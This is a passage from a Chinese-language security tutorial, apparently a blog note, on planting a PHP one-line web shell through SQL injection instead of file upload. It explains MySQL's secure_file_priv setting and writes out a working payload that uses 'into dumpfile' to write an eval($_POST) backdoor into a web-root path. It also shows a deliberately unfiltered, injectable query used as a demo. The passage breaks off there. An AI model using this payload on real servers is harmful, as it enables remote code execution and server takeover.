除了文件上传还有哪些方式可以写一句话木马?
一句话木马如果上传到服务器的话,有啥危害学过网络安全的人都知道。但是通常网上流传的方式都是通过文件上传来实现木马上传,实在太过老套,这里就教大家几个新的方式来本地生成一句话木马。(这篇笔记知识带大家入个门,想了解的话还得自己查询资料来学习)
这篇笔记也是有很多跳转内容,看不懂可以尝试看看跳转的博客,他们写的一定是比我更好
结合sql注入生成一句话木马
讲这之前得先介绍mysql配置文件中的secure_file_priv选项
secure_file_priv配置
- secure_file_priv为null 表示不允许导入导出 (5.7后为默认值)
- secure_file_priv指定文件夹时,表示mysql的导入导出只能发生在指定的文件夹
- secure_file_priv没有设置时,则表示没有任何限制
配置文件的位置:
在windos下
mysql.ini的[mysqld]下添加
在linux下
/etc/my.cnf的[mysqld]下添加
也就是说,这个配置一旦打开,我们就能够通过sql语句来实现生成文件功能了
接下来就是重点介绍生成文件的两个mysql语法了
into dumpfile
这个语法的作用就是用于自定义写shell文件
例如:
select "<?php eval($_POST[shell]);?>" into dumpfile 'D:\\phpStudy\\PHPTutorial\\WWW\\html\\one\\shell.php'
into dumpfile后面只能跟绝对路径。
这里我准备了一个实例给大家
这就是一个简单的整型注入。主要是用于演示,所以就没有进行任何过滤。
在他后端的代码则是
select Name from name where Id = $_GET['id']